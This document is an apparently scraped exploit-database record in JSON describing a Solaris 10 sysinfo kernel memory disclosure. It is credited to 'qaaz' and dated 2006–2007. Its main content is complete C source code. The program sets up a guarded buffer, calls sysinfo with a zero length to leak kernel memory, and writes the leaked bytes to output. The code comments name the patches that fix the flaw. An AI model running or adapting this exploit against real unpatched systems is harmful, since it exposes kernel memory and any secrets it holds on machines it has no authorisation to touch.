Description
Exploit for the Solaris platform in the local exploits category
{"id": "1337DAY-ID-7724", "type": "zdt", "bulletinFamily": "exploit", "title": "Solaris 10 x86/sparc sysinfo Kernel Memory Disclosure Exploit", "description": "Exploit for solaris platform in category local exploits", "published": "2007-09-01T00:00:00", "modified": "2007-09-01T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://0day.today/exploit/description/7724", "reporter": "qaaz", "references": [], "cvelist": [], "immutableFields": [], "lastseen": "2018-02-21T01:36:59", "viewCount": 9, "enchantments": {"score": {"value": 0.1, "vector": "NONE"}, "dependencies": {}, "backreferences": {}, "exploitation": null, "vulnersScore": 0.1}, "sourceHref": "https://0day.today/exploit/7724", "sourceData": "=============================================================\r\nSolaris 10 x86/sparc sysinfo Kernel Memory Disclosure Exploit\r\n=============================================================\r\n\r\n\r\n\r\n/* 07/2006: public release\r\n * SPARC Solaris 10 without 118833-09\r\n * x86 Solaris 10 without 118855-06\r\n *\r\n * Solaris sysinfo Kernel Memory Disclosure\r\n * By qaaz\r\n */\r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <unistd.h>\r\n#include <string.h>\r\n#include <sys/mman.h>\r\n#include <sys/systeminfo.h>\r\n\r\n#define PAGE_COUNT\t1000\r\n\r\nint\tmain(int argc, char *argv[])\r\n{\r\n\tchar\t*buf, *end;\r\n\tint\tpg = PAGE_COUNT, pagesz, bufsz;\r\n\r\n\tfprintf(stderr,\r\n\t\t\"---------------------------------\\n\"\r\n\t\t\" Solaris sysinfo Kmem Disclosure\\n\"\r\n\t\t\" By qaaz\\n\"\r\n\t\t\"---------------------------------\\n\");\r\n\r\n\tif (argc > 1) pg = atoi(argv[1]);\r\n\r\n\tpagesz = getpagesize();\r\n\r\n\tbufsz = (pg + 1) * pagesz;\r\n\tif (!(buf = memalign(pagesz, bufsz))) {\r\n\t\tperror(\"malloc\");\r\n\t\treturn -1;\r\n\t}\r\n\r\n\tmemset(buf, 0, bufsz);\r\n\tend = buf + (pg * pagesz);\r\n\r\n\tfprintf(stderr, \"-> [ %p .. 
%p ]\\n\", buf, end);\r\n\tfflush(stderr);\r\n\r\n\tif (mprotect(end, pagesz, PROT_NONE)) {\r\n\t\tperror(\"mprotect\");\r\n\t\treturn -1;\r\n\t}\r\n\r\n\tsysinfo(SI_SYSNAME, buf, 0);\r\n\r\n\twhile (end > buf && end[-1] == 0)\r\n\t\tend--;\r\n\tfprintf(stderr, \"== %d\\n\", (int) (end - buf));\r\n\tfflush(stderr);\r\n\r\n\tif (!isatty(1))\r\n\t\twrite(1, buf, (size_t) (end - buf));\r\n\treturn 0;\r\n}\r\n\r\n\r\n\n# 0day.today [2018-02-20] #", "_state": {"dependencies": 1647746456, "score": 1659766679, "epss": 1678811959}}